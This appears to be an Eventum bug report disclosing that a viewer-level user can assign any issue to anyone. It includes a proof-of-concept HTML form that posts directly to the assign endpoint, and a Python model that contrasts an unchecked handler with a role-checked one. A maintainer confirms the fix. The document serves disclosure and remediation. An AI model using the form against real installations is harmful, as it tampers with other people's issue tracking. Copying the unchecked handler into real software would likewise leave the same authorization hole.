Bug #9097 Hack: viewer can assign any issue to anyone.
Submitted: 10 Mar 2005 17:57    Modified: 10 Mar 2005 18:43
Reporter: Paul Mach
Status: Closed
Category: Eventum    Severity: S2 (Serious)
Version: 1.5    OS: N/A
Assigned to: Bryan Alsdorf    CPU Architecture: Any

[10 Mar 2005 17:57] Paul Mach
Description:
If a person has viewer permissions, they can assign any issue to any user. They can even assign themselves to issues.

To do this, the "viewer" needs the issue ids and the user id. 

Although this isn't a security issue exactly, it can be a huge inconvenience. Any installation that allows anyone to sign up as a user is susceptible.

How to repeat:
Login as a Viewer
Open another browser window and load this file after changing the form action to the path for the desired installation.

<html><body>
<!-- form tag must not be self-closed, otherwise the inputs are outside the form -->
<form action="http://localhost/popup.php" method="post">
<input type="hidden" name="cat" value="assign">

Enter Issue Ids (1 per box)<br />
<input type="text" name="item[]" value="" size="3">
<input type="text" name="item[]" value="" size="3">
<input type="text" name="item[]" value="" size="3">

<br /><br />
Enter in the User id you want to assign to these issues
<input type="text" name="users">
<br /><br />
<input type="submit" value="Submit">
</form>
</body></html>

Enter the issue ids.
Enter the user id.
Click Submit.

Suggested fix:
Some sort of user permission checking in Issue::Assign().
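The check the report asks for, as an added example that is not Eventum's own code: a minimal model of the assign handler with and without a server-side permission check in the assign path. The role ladder, the in-memory user and issue tables, the Forbidden exception and the helper names are all assumptions; the POST fields (cat=assign, item[], users) are the ones the PoC form above sends.

```python
"""Hypothetical model of an issue-assign handler, not Eventum code.

Shows why the fix belongs in the shared assign routine: the PoC posts
straight to the endpoint, so hiding the assign button in the UI does nothing.
"""

VIEWER, REPORTER, DEVELOPER, MANAGER = 1, 2, 3, 4  # assumed role ladder, higher = more privilege


class Forbidden(Exception):
    """Raised when the session user may not perform the action (assumed name)."""


def sample_state():
    """Constructed sample data: user id -> (login, role); issue id -> set of assignee ids."""
    return {
        "users": {1: ("alice", MANAGER), 2: ("bob", DEVELOPER), 3: ("eve", VIEWER)},
        "issues": {10: set(), 11: set(), 12: set()},
    }


def parse_post(post):
    """Validate the PoC's fields: cat=assign, item[] (issue ids), users (target user id)."""
    if post.get("cat") != "assign":
        raise ValueError("unsupported cat")
    try:
        target = int(post["users"])
        items = [int(raw) for raw in post.get("item[]", [])]
    except (KeyError, TypeError, ValueError):
        raise ValueError("malformed ids") from None
    if not items:
        raise ValueError("no issues given")
    return items, target


def assign_unchecked(state, session_uid, post):
    """Vulnerable shape: never asks who is making the request, so any logged-in
    viewer who knows the ids can assign anyone (including themselves) to anything."""
    items, target = parse_post(post)
    for iid in items:
        state["issues"][iid].add(target)
    return items


def assign_checked(state, session_uid, post):
    """Hardened shape: authorization and validation live in the assign path itself."""
    users, issues = state["users"], state["issues"]
    if session_uid not in users:
        raise Forbidden("not logged in")
    if users[session_uid][1] < DEVELOPER:          # viewers and reporters may not assign
        raise Forbidden("role may not assign issues")
    items, target = parse_post(post)
    if target not in users or users[target][1] < DEVELOPER:
        raise ValueError("target user cannot be assigned issues")
    unknown = [iid for iid in items if iid not in issues]
    if unknown:
        raise ValueError(f"unknown issues {unknown}")
    for iid in items:
        issues[iid].add(target)
    return items


def viewer_attack(handler):
    """Replay the report's PoC as user 3 (a viewer) assigning themself to issues 10 and 11.
    Returns 'assigned' if the handler let it through, 'denied' otherwise."""
    state = sample_state()
    post = {"cat": "assign", "item[]": ["10", "11"], "users": "3"}
    try:
        handler(state, 3, post)
    except Forbidden:
        return "denied"
    return "assigned" if 3 in state["issues"][10] else "denied"


if __name__ == "__main__":
    print("unchecked:", viewer_attack(assign_unchecked))  # assigned
    print("checked:  ", viewer_attack(assign_checked))    # denied
```

The point of putting the check in the shared routine rather than in the page that renders the assign control is that every entry point (here the popup.php action) goes through it; the role test also has to run before any write, and the target user is validated so a viewer cannot be made an assignee even by a privileged caller.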
[10 Mar 2005 18:43] Bryan Alsdorf
Thanks for the report, this is now fixed and will be in our 1.5.1 release.